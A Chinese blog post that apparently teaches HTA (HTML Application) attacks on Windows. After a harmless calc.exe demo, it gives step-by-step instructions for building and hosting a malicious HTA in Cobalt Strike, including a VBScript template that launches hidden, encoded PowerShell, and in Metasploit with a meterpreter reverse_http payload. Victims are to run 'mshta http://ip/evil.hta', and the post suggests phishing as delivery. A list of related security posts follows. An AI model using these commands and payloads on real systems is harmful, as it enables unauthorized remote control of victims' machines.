HTA(html应用程序)攻击
HTA 介绍
HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件界面没什么差别
大多数的Windows操作系统都支持Hta文件执行,可双击运行hta应用或命令行窗口mshta.exe解析执行文件,这里的.hta文件可以是本地的也可以是可访问的远程主机上的
HTA虽然用HTML、JS和CSS编写,却比普通网页权限大得多。它具有桌面程序的所有权限(读写文件、操作注册表等)
HTA 简单用法
可双击运行hta应用或命令窗口mshta.exe解析执行
<script>hta = new ActiveXObject("WScript.Shell");hta.run("%windir%\\System32\\cmd.exe /c calc.exe", 0); window.close();
</script>
保存为HTA文件后就可以打开 执行后会弹出计算器
CS中利用
生成一个远端HTA恶意脚本
设置监听器
Method(payload)建议使用powershell,担心部分系统版本不兼容
HTML应用文件生成好后,来到Attacks --> Web Drive-by --> Host File
,选择刚才生成的文件,最后点击Launch,复制CS创建的链接,在目标主机上打开此链接
浏览器访问链接即可下载该hta文件,这种方式也可用于钓鱼
也可以在目标机器的命令行窗口上执行 mshta http://ip/evil.hta
即可完成上线
默认情况下,这是以powershell作为payload的hta文件
<script language="VBScript">Function var_func()Dim var_shellSet var_shell = CreateObject("Wscript.Shell")var_shell.run "powershell -nop -w hidden -encodedcommand [powershell脚本内容]“, 0, trueEnd Functionvar_funcself.close
</script>
MSF中利用
use exploit/windows/misc/hta_server
set payload windows/meterpreter/reverse_http
set lhost ip
set lport 监听端口
exploit -j
同样,在目标机器的命令行窗口上执行 mshta http://ip/evil.hta
即可完成上线
GOT IT!
******************************************************
小实验小结,具体测试利用方式需根据具体实践场景~
HTA(html应用程序)攻击相关推荐
- Kali 渗透测试:利用HTA文件进行渗透攻击
Kali 渗透测试:利用HTA文件进行渗透攻击 由于浏览器安全技术发展很快,很多时候面对一些安全的浏览器(就是暂时没有发现漏洞的浏览器), 这时通常需要选择一种不需要依赖漏洞的手段,这种手段看起来是个 ...
- 【警惕】大量未修复WebLogic WSAT组件RCE漏洞的主机被挖矿程序攻击
警惕 从1月1日开始,大量未修复WebLogic WSAT(全称:Web Services Atomic Transactions)组件RCE漏洞的主机被挖矿程序攻击,尤其是1月3日,更是大面积爆发 ...
- [HTA] - HTML应用程序
来源:http://baike.baidu.com/view/712376.htm?fr=ala0_1_1 HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接 ...
- centos8 处理挖矿程序攻击
ll /usr/bin/top* top命令被修改,并且隐藏了两个进程 chattr命令不可用,先删除e2fsprogs再重新安装. yum remove e2fsprogs #rpm -qa|gre ...
- 自动关机HTA桌面小程序实现源码
<html> <head> <title>定时关机小程序</title> <HTA:APPLICATIONAPPLICATIONNAME=&quo ...
- 阿里云ECS遭挖矿程序攻击解决方法(彻底清除挖矿程序,顺便下载了挖矿程序的脚本)
一:杀死挖矿程序进程 在服务器上使用top指令查看cpu的使用情况,发现有一个叫java的程序占用cpu高达99.9% PID USER PR NI VIRT RES SHR S %CPU %MEM ...
- .NET 2.0应用程序攻击时-安装.NET Runtime之后调试怪异现象
I've been developing using the Logitech io2 Pen SDK recently and also, coincidentally installed .NET ...
- 阿里云服务器糟挖矿程序攻击
最近新买的阿里云esc服务器,搭建好环境运行一周多就天天收到安全告警短息,终于昨天搭建的服务崩溃了,CPU和内存达到极限,打阿里云客服也帮不上忙,于是开始了服务器的杀毒操作. 删除恶意脚本文件,直接r ...
- 从 HTA 中启动应用程序
从 HTA 中启动应用程序 作者: sterben 发布: 2021年11月25日 24阅读 0评论 如何从 HTA 中启动应用程序? 问: 您好,脚本专家!对于 HTA,有没有什么可以替代 Ws ...
- c语言wscript.echo用法,WScript.Shell和一种替换方法(如何从 HTA 中启动应用程序?)...
您好,DL.是的,我们确实知道这样的命令,可以在 HTA 中使用并可以替代 Wscript.Shell 命令,我们一会儿就会向您介绍.不过,在介绍它之前,我们应注意到您实际上可以在 HTA 中使用 W ...
最新文章
- 搞定ReentrantReadWriteLock 几道小小数学题就够了
- python入门经典电子书-python从入门到精通pdf
- sql 创建表、删除表 增加字段 删除字段操作
- redis 菜鸟教程
- 一个量化交易员的日常:屌丝版VS土豪版
- 计算机和小学科课题,《小学信息技术课堂有效教学的探索》课题研究方案
- codewars 7×7 Skyscrapers 问题解决
- GNU Radio AM调制解调(一)
- 使用selenium进行模拟登录
- 相机快门_向我的智能手机添加远程相机快门的最简单方法是什么?
- 成都盛迈坤电商:提高店铺商品评分的方法
- 阿刚编程遇到的小问题集合~ 以后回顾用
- 使用VS2012进行单元测试
- 熵速率定义与各类熵的关系
- Win10杀死进程方式
- SPARQL基础知识
- [转载]JSP与EJB
- linux版drastic模拟器设置,NDS模拟器如何设置?怎样配置nds模拟器NO$GBA?
- HTML相关知识点总结
- 计算机丢失d3dx9-41,win7提示“计算机中丢失d3dx9-41.dll”怎么办